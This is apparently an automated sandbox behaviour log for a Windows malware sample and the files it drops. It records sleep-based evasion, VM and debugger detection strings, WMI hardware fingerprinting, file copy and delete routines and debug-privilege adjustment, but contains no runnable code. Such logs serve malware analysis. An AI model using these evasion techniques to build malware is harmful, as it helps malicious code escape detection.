Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8148	Thread sleep time: -360000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8148	Thread sleep time: -59890s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8148	Thread sleep time: -59759s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -35061s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8148	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -33546s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -46089s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -35909s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -53012s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -42762s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -37957s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -44100s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -53130s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -47778s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -58713s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4432	Thread sleep time: -720000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -51372s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -36960s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7180	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -31764s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -54171s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -37432s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -46986s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -54476s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -55005s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -46201s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -58676s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -42529s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -57709s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -49722s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -54003s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -36205s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -41023s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -35972s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -33757s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -48291s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -49249s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -45123s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -44683s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -51805s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -54334s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -35511s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -49472s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -57176s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -39332s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -50567s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -32333s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -50212s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -36658s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -33896s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -45798s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -40868s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -47604s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -55594s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -39496s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060	Thread sleep time: -58378s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 5004	Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 1780	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7720	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe TID: 3664	Thread sleep count: 58 > 30
Source: C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe TID: 3664	Thread sleep time: -41238s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\kO1P1YnLst.exe

File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00412570
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040D1C0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_004015C0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	1_2_00411650
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040B610
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	1_2_0040DB60
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_00411B80
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_0040D540
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	1_2_004121F0
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_6C7B261E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	2_2_6C7B261E

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe

Code function: 1_2_00401120 GetSystemInfo,ExitProcess,

1_2_00401120

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59759
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 35061
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 33546
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 46089
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 35909
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 53012
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 42762
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 37957
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 44100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 53130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 47778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58713
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 51372
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 36960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 31764
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 37432
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 46986
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54476
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 46201
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 42529
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 57709
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 49722
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 36205
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 41023
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 35972
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 33757
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 48291
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 49249
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 45123
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 44683
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 51805
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54334
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 35511
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 49472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 57176
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 39332
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 50567
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32333
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 50212
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 36658
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 33896
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 45798
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 40868
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 47604
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 39496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58378
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\kO1P1YnLst.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	File opened: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	File opened: C:\Users\user\AppData\Local\Temp\u5c4.2	Jump to behavior

Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Microsoft Hyper-V Server
Source: u5c4.3.exe, 00000005.00000003.2274120059.0000000000A57000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3056243816.00000240F83D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Datacenter without Hyper-V Core
Source: cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: QEMU_HARDU
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Standard without Hyper-V Full
Source: u5c4.0.exe, 00000001.00000002.2500095496.000000000436A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware<
Source: cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Enterprise without Hyper-V Core
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3056243816.00000240F8365000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
Source: kO1P1YnLst.exe, 00000000.00000002.1986096149.0000000004311000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2500095496.0000000004395000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0
Source: u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: VMWARE_VIRTUAL
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3056243816.00000240F83D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: "Caption": "VMware Virtual disk",
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3056243816.00000240F83D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MSFT_PhysicalDisk{1}\\user-PC\root/Microsoft/Windows/Storage/Providers_v2\SPACES_PhysicalDisk.ObjectId="{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PD:{fadc7a83-6534-864a-66c8-a75a642cb79f}"6000C2942FCE4D06663969F532E45D1AVMware Virtual diskVMwareVirtual disk6000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0k
Source: MSBuild.exe, 0000000E.00000002.2971140255.000000000107D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: 6without Hyper-V for Windows Essential Server Solutions
Source: cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: u5c4.0.exe, 00000001.00000002.2500095496.000000000436A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Standard without Hyper-V Core
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Datacenter without Hyper-V Full
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Enterprise without Hyper-V Full

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	API call chain: ExitProcess graph end node	graph_1-58008
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	API call chain: ExitProcess graph end node	graph_1-56975
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	API call chain: ExitProcess graph end node	graph_1-56972
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	API call chain: ExitProcess graph end node	graph_1-56993
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	API call chain: ExitProcess graph end node	graph_1-56991
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	API call chain: ExitProcess graph end node	graph_1-57016
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	API call chain: ExitProcess graph end node	graph_1-56986
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	API call chain: ExitProcess graph end node	graph_1-56815
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\kO1P1YnLst.exe

Code function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00409A73

Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe

Code function: 2_2_00EFD15B VirtualProtect ?,-00000001,00000104,?,?,?,00000000

2_2_00EFD15B

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe

1_2_00416240

Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_004139E7 mov eax, dword ptr fs:[00000030h]	0_2_004139E7
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_042554B3 push dword ptr fs:[00000030h]	0_2_042554B3
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_05BE0D90 mov eax, dword ptr fs:[00000030h]	0_2_05BE0D90
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_05BF3C4E mov eax, dword ptr fs:[00000030h]	0_2_05BF3C4E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_05BE092B mov eax, dword ptr fs:[00000030h]	0_2_05BE092B
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_00415DC0 mov eax, dword ptr fs:[00000030h]	1_2_00415DC0

Source: C:\Users\user\Desktop\kO1P1YnLst.exe

Code function: 0_2_00420AEA GetProcessHeap,

0_2_00420AEA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00409A73
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_00409C06 SetUnhandledExceptionFilter,	0_2_00409C06
